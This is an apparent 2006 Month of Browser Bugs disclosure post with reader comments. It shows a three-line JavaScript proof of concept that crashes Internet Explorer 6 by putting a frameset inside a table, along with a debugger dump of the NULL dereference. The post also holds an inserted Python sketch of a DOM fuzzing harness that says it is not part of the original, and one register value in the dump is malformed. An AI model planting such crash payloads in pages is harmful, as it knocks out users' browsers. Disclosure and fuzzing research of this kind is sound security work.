Thursday, July 06, 2006

MoBB #7: Table.Frameset

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug was found by Aviv Raff using the DOM-Hanoi fuzzer script. DOM-Hanoi works by building trees of every combination of elements up to the specified depth. An alternate PoC could use plain HTML instead of JavaScript.

// Create a <frameset> and append it as a child of a <table> through the DOM API;
// IE6 then dereferences a NULL pointer in mshtml!CTreePos::NextTreePos (see below).
var a = document.createElement('table');
var b = document.createElement('frameset');
a.appendChild(b);
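To show how a DOM-Hanoi style enumeration is structured, here is an added Python sketch that is not DOM-Hanoi's code nor part of this post: it assumes the "combinations" are linear nesting chains built with the same createElement/appendChild calls as the PoC, uses xml.dom.minidom as a stand-in DOM implementation to exercise, and isolates each case so a single failing combination (like table > frameset) is recorded instead of aborting the run.

```python
import itertools
from xml.dom import minidom

# Element names to combine; a constructed sample, not DOM-Hanoi's real tag list.
TAGS = ["table", "frameset", "div"]

def chains(tags, max_depth):
    """Yield every nesting chain (outermost first) of 1..max_depth elements,
    with repetition allowed, e.g. ('table', 'frameset')."""
    for depth in range(1, max_depth + 1):
        yield from itertools.product(tags, repeat=depth)

def build_tree(doc, chain):
    """Build one chain with createElement/appendChild (the DOM calls the PoC
    uses) and return the outermost element."""
    root = doc.createElement(chain[0])
    parent = root
    for name in chain[1:]:
        child = doc.createElement(name)
        parent.appendChild(child)
        parent = child
    return root

def to_js(chain):
    """Render one case as a JavaScript snippet in the style of the PoC above."""
    lines = []
    for i, name in enumerate(chain):
        lines.append(f"var e{i} = document.createElement('{name}');")
        if i:
            lines.append(f"e{i - 1}.appendChild(e{i});")
    return "\n".join(lines)

def run_cases(tags, max_depth, build=build_tree):
    """Exercise every chain in isolation against a DOM implementation (minidom
    here as a stand-in) and return (cases_run, [(chain, error), ...]) so the
    exact failing combination is reported rather than lost in a crash."""
    failures = []
    total = 0
    for chain in chains(tags, max_depth):
        total += 1
        doc = minidom.Document()  # fresh document per case, like a fresh page load
        try:
            build(doc, chain).toxml()
        except Exception as exc:  # record which combination failed and how
            failures.append((chain, repr(exc)))
    return total, failures
```

With a real browser target the build step would run inside the browser and the harness would watch for the process dying instead of catching an exception.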

Demonstration

eax=00000000 ebx=01884710 ecx=01886c60
edx=00000027 esi=0013aeb0 edi=01884730
eip=7dc995ad esp=0013ae88 ebp=0013ae9c6
mshtml!CTreePos::NextTreePos+0x23:
7dc995ad f60010 test byte ptr [eax],0x10 ds:0023:00000000=??

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE Frameset inside Table NULL Dereference

14 Comments:

At 8:36 PM, Anonymous Juano said...

hi hdm, it's ok
no crash in Opera 9 Linux
=)

 
At 9:42 PM, Anonymous Anonymous said...

Full IE6 fuckup on Win2K.

 
At 12:58 AM, Anonymous Anonymous said...

As far as I can tell, plain HTML can't trigger this, presumably because the parser doesn't create the same DOM structure. --Hixie

 
At 2:53 AM, Anonymous Anonymous said...

doesn't work on IE7

 
At 4:32 AM, Anonymous Anonymous said...

no crash on Opera 8.54, WinXP Pro

 
At 7:10 AM, Anonymous Anonymous said...

to all the peeps with Opera, Firefox, etc... I clearly see it's said that this works on IE6/XP SP2 ... don't expect 3 lines of JavaScript to crash all possible browsers :)

 
At 7:31 AM, Anonymous Anonymous said...

That's incorrect code anyways. You can't add a table to a frameset. What a shocker you get an error.

 
At 8:04 AM, Blogger Jonathan Zencovich said...

Interesting blog, with an interesting goal.

I hope you help raise awareness for browser security, but from what I hear, you're reposting other people's exploits, not your own. Can you confirm/deny this?


--Jon Z

 
At 8:31 AM, Blogger hdm said...

Out of the seven so far, I discovered five of these. One of these five was discovered by three people all in the same period of time (#4), all using different methods of reaching the bug. The two that I did not find on my own (#7, #5) were submitted by friends of mine for the purpose of contributing to the project. Any bug I post to this blog is either my own research or submitted by a friend and used with permission.

 
At 8:34 AM, Blogger cassandra said...

this blog is an eye opener to all internet users that computer security should not be neglected... good job...
thanks for helping us better understand what's happening in our browser ...

 
At 9:00 AM, Anonymous Anonymous said...

NO crash on
Internet Explorer 7 Beta 3
Internet Explorer 7 Beta 2
Internet Explorer 5.5
Internet Explorer 5.01
Firefox 1.5.0.4
Firefox 1.5.0.3
Opera 9.0
Opera 8.54
Netscape 8.1
/ Windows XP SP2, fully patched

Crash on
Internet Explorer 6

 
At 1:34 PM, Anonymous Anonymous said...

http://www.sci-tech-today.com/story.xhtml?story_id=012001C8FE8C

 
At 8:55 PM, Anonymous Anonymous said...

Hey HDM... if you have a bug for Opera please post that for MoBB #8 or 9. I'm curious how secure Opera really is. I'm curious because Opera has a nice record of patched bugs according to Secunia and it seems too good to be true, yet I have no proof of any present unpatched bugs?

Other than that THERE IS NO NEED TO ADD THIS TO COMMENTS!!!!!

Thank you

 
At 5:48 PM, Anonymous Anonymous said...

IE7 is not affected, IE6 crashes as it should. ;)

 
